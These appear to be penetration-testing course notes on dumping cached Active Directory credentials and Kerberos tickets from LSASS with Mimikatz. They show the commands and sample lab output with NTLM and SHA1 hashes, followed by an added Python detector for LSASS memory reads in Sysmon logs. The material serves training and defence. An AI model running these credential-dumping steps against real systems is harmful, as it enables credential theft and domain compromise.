Cached AD Credentials
In modern versions of Windows, Kerberos hashes are stored in the Local Security Authority Subsystem Service (LSASS) memory space.
If we gain access to these hashes, we could crack them to obtain the cleartext password or reuse them to perform various actions. Although this is the end goal of our AD attack, the process is not straightforward.
The LSASS process is part of the operating system and runs as SYSTEM, so we need SYSTEM (or local administrator) permissions to access the hashes stored on a target.
Because of this, we often have to start our attack with a local privilege escalation in order to retrieve the stored hashes. In addition, the data structures used to store hashes in memory are not publicly documented, and they are also encrypted with an LSASS-stored key.
Since the extraction of cached credentials is a large attack vector against Windows and Active Directory, several tools have been created to extract the hashes. The most popular of these tools is Mimikatz.
Dumping LSASS Password Hashes
Start mimikatz and enter privilege::debug to engage the SeDebugPrivilege privilege, which allows us to interact with a process owned by another user:
PS C:\Windows\system32> cd C:\Tools
PS C:\Tools\> .\mimikatz.exe
...
mimikatz # privilege::debug
Privilege '20' OK
Next, run sekurlsa::logonpasswords to dump the credentials of all logged-on users with the Sekurlsa module:
mimikatz # sekurlsa::logonpasswords
Authentication Id : 0 ; 4876838 (00000000:004a6a26)
Session : RemoteInteractive from 2
User Name : jeff
Domain : CORP
Logon Server : DC1
Logon Time : 9/9/2022 12:32:11 PM
SID : S-1-5-21-1987370270-658905905-1781884369-1105
msv :
[00000003] Primary
* Username : jeff
* Domain : CORP
* NTLM : 2688c6d2af5e9c7ddb268899123744ea
* SHA1 : f57d987a25f39a2887d158e8d5ac41bc8971352f
* DPAPI : 3a847021d5488a148c265e6d27a420e6
tspkg :
wdigest :
* Username : jeff
* Domain : CORP
* Password : (null)
kerberos :
* Username : jeff
* Domain : CORP.COM
* Password : (null)
ssp :
credman :
cloudap :
...
Authentication Id : 0 ; 122474 (00000000:0001de6a)
Session : Service from 0
User Name : dave
Domain : CORP
Logon Server : DC1
Logon Time : 9/9/2022 1:32:23 AM
SID : S-1-5-21-1987370270-658905905-1781884369-1103
msv :
[00000003] Primary
* Username : dave
* Domain : CORP
* NTLM : 08d7a47a6f9f66b97b1bae4178747494
* SHA1 : a0c2285bfad20cc614e2d361d6246579843557cd
* DPAPI : fed8536adc54ad3d6d9076cbc6dd171d
tspkg :
wdigest :
* Username : dave
* Domain : CORP
* Password : (null)
kerberos :
* Username : dave
* Domain : CORP.COM
* Password : (null)
ssp :
credman :
cloudap :
...
Exploiting Kerberos TGT and Service Tickets
A different approach from dumping NTLM hashes and trying to crack them would be to use Mimikatz to exploit Kerberos authentication by using TGT and service tickets. Kerberos TGT and service tickets for users currently logged on to the local machine are stored for future use. These tickets are also stored in LSASS, and we can use Mimikatz to interact with and retrieve our own tickets as well as the tickets of other local users.
Cache a Service Ticket
Once the directory listing has been executed on the SMB share (which requests a service ticket for that share and caches it), we can use Mimikatz to show the tickets that are stored in memory by using sekurlsa::tickets.
The output contains both a TGT and a TGS. Stealing the TGS would allow us to access only particular resources associated with those tickets. Alternatively, armed with a TGT, we could request a TGS for specific resources we want to target within the domain.
Mimikatz can also export tickets to the hard drive and import tickets into LSASS.
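As a defensive counterpart to the sekurlsa::logonpasswords and sekurlsa::tickets steps above, which both open lsass.exe and read its memory, here is an added Python example (not from the original notes) that flags such reads in Sysmon Event ID 10 ProcessAccess records; the sample events and the allowlist are constructed assumptions.

```python
"""Flag LSASS memory reads in Sysmon Event ID 10 (ProcessAccess) records.
sekurlsa::logonpasswords and sekurlsa::tickets both open lsass.exe and read
its memory, which is exactly what this event records. Added example, not part
of the original notes; sample events are constructed, the allowlist is assumed."""

# Process access-right bit (winnt.h); a memory dump cannot avoid PROCESS_VM_READ.
PROCESS_VM_READ = 0x0010

# Assumed allowlist of images that legitimately open LSASS; tune per environment.
ALLOWED_SOURCES = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\program files\windows defender\msmpeng.exe",
}

# Constructed Event ID 10 records reduced to the fields the rule needs.
# The first mirrors the Mimikatz session run from C:\Tools shown in the notes.
SAMPLE_EVENTS = [
    {"SourceImage": r"C:\Tools\mimikatz.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1010"},
    {"SourceImage": r"C:\Program Files\Windows Defender\MsMpEng.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1fffff"},
    {"SourceImage": r"C:\Windows\System32\taskmgr.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1400"},
    {"SourceImage": r"C:\Users\jeff\AppData\Local\Temp\dumper.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1fffff"},
    {"SourceImage": r"C:\Tools\mimikatz.exe",
     "TargetImage": r"C:\Windows\system32\notepad.exe", "GrantedAccess": "0x1010"},
]


def reads_memory(granted_access):
    """True if the hex access mask includes PROCESS_VM_READ (0x1010, 0x1fffff, ...)."""
    return bool(int(granted_access, 16) & PROCESS_VM_READ)


def is_lsass_dump_candidate(event):
    """Unlisted source image reading lsass.exe memory -> credential-dump candidate."""
    if not event["TargetImage"].lower().endswith(r"\lsass.exe"):
        return False
    if event["SourceImage"].lower() in ALLOWED_SOURCES:
        return False
    return reads_memory(event["GrantedAccess"])


def find_lsass_dump_candidates(events):
    """Return the source images of every event the rule flags, in log order."""
    return [e["SourceImage"] for e in events if is_lsass_dump_candidate(e)]


if __name__ == "__main__":
    for image in find_lsass_dump_candidates(SAMPLE_EVENTS):
        print("LSASS memory read by unlisted image:", image)
```

On a real host the same rule runs over the Sysmon operational log, and Security event 4703 recording SeDebugPrivilege being enabled (what privilege::debug does) is a useful companion signal.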